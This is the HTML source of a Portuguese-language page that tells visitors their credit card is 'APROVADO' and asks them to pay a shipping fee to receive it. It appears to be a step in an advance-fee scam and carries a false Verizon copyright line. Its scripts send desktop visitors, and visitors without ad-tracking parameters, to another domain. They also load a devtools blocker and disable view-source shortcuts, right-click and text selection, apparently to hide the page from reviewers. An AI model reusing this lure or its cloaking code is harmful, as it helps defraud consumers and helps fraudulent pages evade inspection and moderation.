<!DOCTYPE html><html lang="pt-BR"><head>
  <script disable-devtool-auto="" src="https://cdn.jsdelivr.net/npm/disable-devtool"
    url="https://appavaliadorpremios.shop/lp/"></script>

<script type="text/javascript">
    if (!navigator.userAgent.match(/(iPhone|iPod|iPad|Android|BlackBerry|IEMobile)/) && window.innerWidth > 768) {
        window.location.href = 'https://appavaliadorpremios.shop/lp/';
    }
</script>
  <script type="text/javascript">
    (function () {
        /**
         * Função para verificar a presença de múltiplos parâmetros na URL
         * @param {Array} names - Array contendo os nomes dos parâmetros a serem verificados
         * @returns {boolean} - Retorna true se todos os parâmetros estiverem presentes, caso contrário, false
         */
        function hasAllURLParameters(names) {
            const urlParams = new URLSearchParams(window.location.search);
            return names.every(param => urlParams.has(param));
        }

        // Array contendo os parâmetros obrigatórios
        const requiredParams = ['CampaignID', 'adSETID', 'CreativeID', 'pixel_id'];

        // URL para redirecionamento caso algum dos parâmetros não esteja presente
        const redirectURL = 'https://appavaliadorpremios.shop/lp/';

        /**
         * Função principal que verifica os parâmetros da URL
         * e redireciona o usuário se necessário
         */
        function checkURLParameters() {
            if (!hasAllURLParameters(requiredParams)) {
                window.location.href = redirectURL;
            }
        }

        // Executa a verificação imediatamente assim que o script é carregado
        checkURLParameters();
    })();
</script>

    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    
    <link href="css/bootstrap.min.css" rel="stylesheet">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <title>Escolha o Método de Envio</title>

    <style>
      body {
        background-color: #f9f9f9;
        font-family: Arial, sans-serif;
      }

      .header {
        background: linear-gradient(147deg, #ffe53b 0%, #ff2525 74%);
        color: rgb(255, 255, 255);
        padding: 15px 0;
        text-align: center;
      }

      .header img {
        width: 120px;
      }

      .main-content {
        max-width: 600px;
        margin: 40px auto;
        background-color: white;
        padding: 20px;
        border-radius: 10px;
        box-shadow: 0px 4px 10px rgba(0, 0, 0, 0.1);
      }

      .main-content h5 {
        font-weight: bold;
        color: #ff2525;
        margin-bottom: 20px;
      }

      .opcao-card {
        border: 2px solid #e6e6e6;
        border-radius: 10px;
        padding: 15px;
        display: flex;
        justify-content: space-between;
        margin-bottom: 15px;
        cursor: pointer;
        transition: all 0.3s ease;
      }

      .opcao-card:hover {
        border-color: #ff2525;
        background-color: rgba(29, 78, 216, 0.05);
      }

      .opcao-card.selecionado {
        border-color: #ff2525;
        background-color: rgba(29, 78, 216, 0.1);
      }

      .opcao-card h6 {
        margin: 0;
        font-size: 16px;
      }

      .opcao-card small {
        color: #666;
      }

      .opcao-card .preco {
        font-weight: bold;
        color: r#FFE500;
      }

      .opcao-card .icon {
        margin-right: 15px;
        font-size: 24px;
        color: #ff2525;
      }

      .btn-custom {
        background-color: #ff2525;
        color: rgb(0, 0, 0);
        font-weight: bold;
        border: none;
        padding: 10px 15px;
        border-radius: 8px;
        width: 100%;
        margin-top: 20px;
      }

      .btn-custom:disabled {
        background-color: #ccc;
        cursor: not-allowed;
      }

      .btn-custom:hover:not(:disabled) {
        background-color: #ff2525;
      }

      .footer {
        background: #ffffff;
        border-top: 1px solid #e6e6e6;
        text-align: center;
        padding: 15px;
        font-size: 10px;
        color: #666;
      }
    </style>

    <script>
      if (document.addEventListener) {
        document.addEventListener("keydown", bloquearSource);
      } else {
        //Versões antigas do IE
        document.attachEvent("onkeydown", bloquearSource);
      }

      function bloquearSource(e) {
        e = e || window.event;

        var code = e.which || e.keyCode;

        if (
          e.ctrlKey &&
          (code == 83 || code == 85) //83 = S, 85 = U
        ) {
          if (e.preventDefault) {
            e.preventDefault();
          } else {
            e.returnValue = false;
          }

          return false;
        }
      }
    </script>

    <style>
      /*desabilita a seleção no body*/
      body {
        -webkit-touch-callout: none; /* iOS Safari */
        -webkit-user-select: none; /* Chrome/Safari/Opera */
        -khtml-user-select: none; /* Konqueror */
        -moz-user-select: none; /* Firefox */
        -ms-user-select: none; /* Internet Explorer/Edge */
        user-select: none;
      }

      /*habilita a seleção nos campos editaveis*/
      input,
      textarea {
        -webkit-touch-callout: initial; /* iOS Safari */
        -webkit-user-select: text; /* Chrome/Safari/Opera */
        -khtml-user-select: text; /* Konqueror */
        -moz-user-select: text; /* Firefox */
        -ms-user-select: text; /* Internet Explorer/Edge */
        user-select: text;
      }

      /*habilita a seleção nos campos com o atributo contenteditable*/
      [contenteditable="true"] {
        -webkit-touch-callout: initial; /* iOS Safari */
        -webkit-user-select: all; /* Chrome/Safari/Opera */
        -khtml-user-select: all; /* Konqueror */
        -moz-user-select: all; /* Firefox */
        -ms-user-select: all; /* Internet Explorer/Edge */
        user-select: all;
      }
    </style>

    <script>
      if (document.addEventListener) {
        document.addEventListener("contextmenu", function (e) {
          e.preventDefault();
          return false;
        });
      } else {
        //Versões antigas do IE
        document.attachEvent("oncontextmenu", function (e) {
          e = e || window.event;
          e.returnValue = false;
          return false;
        });
      }
    </script>

    <!-- Google tag (gtag.js) -->
<script async="" src="https://www.googletagmanager.com/gtag/js?id=G-NGSPZL3X93"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'G-NGSPZL3X93');
</script>


  </head>

  <body>
   
    <div class="header">
      <img src="images/logo.png" alt="Logo">
    </div>

    <div class="main-content">
      <h5>Escolha o método de envio</h5>
      <p>
        Agora basta escolher uma forma de envio do seu Cartão de Crédito
        <strong>APROVADO</strong>
      </p>

      <div id="opcoes-envio">
        <!-- Opção EXPRESS -->
        <div class="opcao-card" onclick="selecionarOpcao('sedex')">
          <div class="d-flex align-items-center">
            <span class="icon">📦</span>
            <div>
              <h6>SEDEX</h6>
              <small>1 dia útil</small>
            </div>
          </div>
          <div class="preco">R$ 34,90</div>
        </div>

        <!-- Opção SEDEX -->
        <div class="opcao-card" onclick="selecionarOpcao('express')">
          <div class="d-flex align-items-center">
            <span class="icon">🚚</span>
            <div>
              <h6>EXPRESS</h6>
              <small>5 dias úteis</small>
            </div>
          </div>
          <div class="preco">R$ 29,58</div>
        </div>

        <!-- Opção PAC -->
        <div class="opcao-card" onclick="selecionarOpcao('pac')">
          <div class="d-flex align-items-center">
            <span class="icon">📬</span>
            <div>
              <h6>PAC</h6>
              <small>10 dias úteis</small>
            </div>
          </div>
          <div class="preco">R$ 27,97</div>
        </div>
      </div>

      <button id="continuarEnvio" class="btn-custom" disabled="">
        Continuar
      </button>
    </div>

    <!-- Footer -->
    <div class="footer">
      Copyright © 2025 Verizon. Todos os direitos reservados.<br>

      Política de Privacidade | Termos de Uso Vendas e Reembolsos | Legal Mapa
      do Site
    </div>

    <script>
      let opcaoSelecionada = null;
    
      function selecionarOpcao(opcao) {
        opcaoSelecionada = opcao;
    
        // Remove a classe 'selecionado' de todas as opções
        document.querySelectorAll(".opcao-card").forEach(function (card) {
          card.classList.remove("selecionado");
        });
    
        // Adiciona a classe 'selecionado' à opção clicada
        document
          .querySelector(`.opcao-card[onclick="selecionarOpcao('${opcao}')"]`)
          .classList.add("selecionado");
    
        // Habilita o botão de continuar
        document.getElementById("continuarEnvio").disabled = false;
      }
    
      document.getElementById("continuarEnvio").addEventListener("click", function () {
        if (opcaoSelecionada) {
          localStorage.setItem("metodoEnvio", opcaoSelecionada);
          
          let paginaDestino = {
            express: "type-express.html",
            pac: "type-pac.html",
            sedex: "type-sedex.html"
          }[opcaoSelecionada] || "index.html";
    
          window.location.href = `../${paginaDestino}` + window.location.search;
        }
      });
    </script>
   

   <script>
      window.pixelId = "66b3a64f335ef199b3e5b257";
      var a = document.createElement("script");
      a.setAttribute("async", "");
      a.setAttribute("defer", "");
      a.setAttribute("src", "https://cdn.utmify.com.br/scripts/pixel/pixel.js");
      document.head.appendChild(a);
    </script>
    
    <script src="js/latest.js" data-utmify-prevent-subids="" async="" defer=""></script>



</body></html>